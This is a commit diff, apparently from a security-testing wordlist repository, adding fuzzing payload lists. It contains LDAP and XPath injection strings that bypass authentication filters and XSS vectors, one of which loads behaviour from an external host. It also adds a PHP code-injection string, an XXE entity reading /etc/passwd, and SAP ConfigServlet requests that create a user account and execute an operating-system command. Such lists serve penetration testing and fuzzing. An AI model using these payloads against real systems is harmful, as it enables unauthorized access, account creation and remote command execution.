Merge pull request #9 from shipcod3/master

Update XML_FUZZ
2025-06-08 14:07:53 +00:00 · 2015-01-12 12:36:38 -08:00 · 2015-01-12 12:36:38 -08:00 · edb75b5be2
commit edb75b5be2
parent 3f9bfc6519 d1bdc1d65a
3 changed files with 43 additions and 0 deletions
--- a/Fuzzing/LDAP_FUZZ.txt
+++ b/Fuzzing/LDAP_FUZZ.txt
@ -0,0 +1,26 @@
+!
+%21
+%26
+%28
+%29
+%2A%28%7C%28mail%3D%2A%29%29
+%2A%28%7C%28objectclass%3D%2A%29%29
+%2A%7C
+%7C
+&
+(
+)
+*(|(mail=*))
+*(|(objectclass=*))
+*/*
+*|
+/
+//
+//*
+@*
+x' or name()='username' or 'x'='y
+|
+*()|&'
+admin*
+admin*)((|userpassword=*)
+*)(uid=*))(|(uid=*
--- a/Fuzzing/XML_FUZZ
+++ b/Fuzzing/XML_FUZZ
@ -11,6 +11,11 @@
 ]>
 <!DOCTYPE autofillupload [<!ENTITY 9eTVC SYSTEM "file:///etc/passwd">
 ]>
+"<xml ID=I><X><C><![CDATA[<IMG SRC=""javas]]><![CDATA[cript:alert('XSS');"">]]>"
+"<xml ID=""xss""><I><B><IMG SRC=""javas<!-- -->cript:alert('XSS')""></B></I></xml><SPAN DATASRC=""#xss"" DATAFLD=""B"" DATAFORMATAS=""HTML""></SPAN></C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>"
+"<xml SRC=""xsstest.xml"" ID=I></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>"
+"<HTML xmlns:xss><?import namespace=""xss"" implementation=""http://ha.ckers.org/xss.htc""><xss:xss>XSS</xss:xss></HTML>"
+<name>','')); phpinfo(); exit;/*</name>


 ## Element and Attrib Values
@ -48,3 +53,13 @@ false
 {{Tnn96}}
 {= Tnn96}
 {{= Tnn96}}
+' or '1'='1
+' or ''='
+x' or 1=1 or 'x'='y
+/
+//
+//*
+*/*
+@*
+count(/child::node())
+x' or name()='username' or 'x'='y
--- a/vulns/sap.txt
+++ b/vulns/sap.txt
@ -92,6 +92,8 @@ caf
 ccsui
 com~tc~lm~webadmin~httpprovider~web
 ctc
+ctc/ConfigServlet?param=com.sap.ctc.util.UserConfig;CREATEUSER;USERNAME=blabla,PASSWORD=blabla
+ctc/servlet/com.sap.ctc.util.ConfigServlet?param=com.sap.ctc.util.FileSystemConfig;EXECUTE_CMD;CMDLINE=ipconfig%20/all
 dispatcher
 dswsbobje
 dtr_lite